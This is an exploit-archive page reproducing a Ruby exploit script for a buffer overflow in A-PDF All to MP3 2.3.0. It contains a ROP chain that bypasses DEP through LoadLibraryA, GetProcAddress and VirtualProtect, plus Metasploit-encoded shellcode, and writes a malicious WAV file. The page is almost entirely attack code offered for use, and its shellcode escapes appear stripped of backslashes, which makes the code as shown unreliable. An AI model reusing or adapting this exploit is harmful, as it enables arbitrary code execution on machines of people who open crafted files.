Home / exploitsPDF  

A-PDF All To MP3 2.3.0 Buffer Overflow

Posted on 11 August 2011

#!/usr/bin/ruby
#
#[+]Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit
#[+]Date: 0982011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.a-pdf.com/all-to-mp3/
#[+]Version: 2.3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#Dep bypass method:
#LoadLibraryA("kernel32.dll") + GetProcAddress(%EAX,"VirtualProtect") + VirtualProtect(%ESP,0x400,0x40,0x10007064) == Universal DEP BYPASS. :)
#
#

#Address for LoadLibraryA 0x6D00CEE8
########################################ROP FOR LOAD LoadLIbraryA("kernell32.dll")###########################
rop = [0x1001FD1C].pack('V') # POP ESI # RETN
rop += [0x6D00CEE8].pack('V') # Address to LoadLibraryA
rop += [0x004936B4].pack('V') # POP EBP # RETN
rop += [0x1003ba4d].pack('V') # ADD ESP,2C # RETN    // Endereço de retorno da funçao LoadLibraryA
rop += [0x004cc008].pack('V') # PUSHAD # POP EBX # RETN
rop += "kernel32.dllx00"
rop += "A" * 15
#########################################ROP END HERE##########################################################

#Address to GetProcAddress 0x6D00CEC8
#########################################ROP FOR GetProcAddress################################################
rop += [0x0040BF8F].pack('V') # POP EDI # RETN
rop += [0x6D00CEC8].pack('V') # Address to GetProcAddress
rop += [0x1001FD1C].pack('V') # POP ESI # RETN
rop += [0x1003ba4d].pack('V') # ADD ESP,2C # RETN  // Endereço de retorno da funçao GetProcAddress
rop += [0x005c59cb].pack('V') # MOV EBP,EAX # RETN
rop += [0x004cc014].pack('V') # PUSHAD # RETN
rop += "VirtualProtectx00"
rop += "A" * 13
#########################################ROP END HERE##########################################################

#########################################ROP FOR VirtualProtect################################################
rop += [0x00544a41].pack('V') # XCHG EAX,ESI # RETN
rop += [0x004AEC05].pack('V') # POP EBP # RETN
rop += [0x00436E98].pack('V') # JMP ESP // Endereço de retorno da funçao VirtualProtect
rop += [0x1002FDC2].pack('V') # POP EBX # RETN
rop += [0x00000500].pack('V') # Valor de dwSize
rop += [0x00402f24].pack('V') # POP EDX # RETN
rop += [0x00000040].pack('V') # Valor de flNewProtect
rop += [0x005c373c].pack('V') # POP ECX # RETN
rop += [0x0040108E].pack('V') # Valor de lpflOldProtect
rop += [0x004cc008].pack('V') # PUSHAD # POP EBX # RETN
#########################################ROP END HERE##########################################################

# windows/exec - 460 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=process, CMD=calc
shellcode =
"xdbxc1xd9x74x24xf4x5bx53x59x49x49x49x43x43" +
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" +
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" +
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" +
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4dx38" +
"x4cx49x43x30x45x50x45x50x43x50x4dx59x5ax45" +
"x50x31x49x42x52x44x4cx4bx50x52x56x50x4cx4b" +
"x51x42x54x4cx4cx4bx56x32x52x34x4cx4bx52x52" +
"x51x38x54x4fx4ex57x50x4ax51x36x50x31x4bx4f" +
"x50x31x4fx30x4ex4cx47x4cx45x31x43x4cx43x32" +
"x56x4cx51x30x4fx31x58x4fx54x4dx45x51x49x57" +
"x5ax42x5ax50x51x42x51x47x4cx4bx51x42x52x30" +
"x4cx4bx47x32x47x4cx45x51x4ex30x4cx4bx47x30" +
"x43x48x4dx55x4fx30x52x54x50x4ax45x51x58x50" +
"x50x50x4cx4bx47x38x45x48x4cx4bx56x38x51x30" +
"x45x51x4ex33x4dx33x47x4cx47x39x4cx4bx50x34" +
"x4cx4bx45x51x49x46x50x31x4bx4fx56x51x4fx30" +
"x4ex4cx49x51x58x4fx54x4dx45x51x4fx37x50x38" +
"x4dx30x52x55x4cx34x54x43x43x4dx5ax58x47x4b" +
"x43x4dx47x54x43x45x4bx52x50x58x4cx4bx56x38" +
"x51x34x45x51x4ex33x52x46x4cx4bx54x4cx50x4b" +
"x4cx4bx51x48x45x4cx43x31x58x53x4cx4bx45x54" +
"x4cx4bx43x31x4ex30x4cx49x47x34x56x44x47x54" +
"x51x4bx51x4bx43x51x56x39x50x5ax50x51x4bx4f" +
"x4bx50x50x58x51x4fx51x4ax4cx4bx54x52x5ax4b" +
"x4bx36x51x4dx52x4ax45x51x4cx4dx4cx45x4ex59" +
"x43x30x45x50x43x30x50x50x52x48x50x31x4cx4b" +
"x52x4fx4cx47x4bx4fx4ex35x4fx4bx5ax50x4fx45" +
"x4fx52x56x36x45x38x49x36x5ax35x4fx4dx4dx4d" +
"x4bx4fx49x45x47x4cx43x36x43x4cx54x4ax4bx30" +
"x4bx4bx4dx30x52x55x54x45x4fx4bx47x37x54x53" +
"x43x42x52x4fx52x4ax43x30x50x53x4bx4fx58x55" +
"x43x53x43x51x52x4cx45x33x45x50x41x41"
buf = "A" * 4128
buf += rop
buf += "x90" * 10
buf += shellcode
buf += "C" * 2000
File.open("Exploit.wav","wb") do |f|
f.write buf
f.close
end

 

TOP

Malware :

Exploits :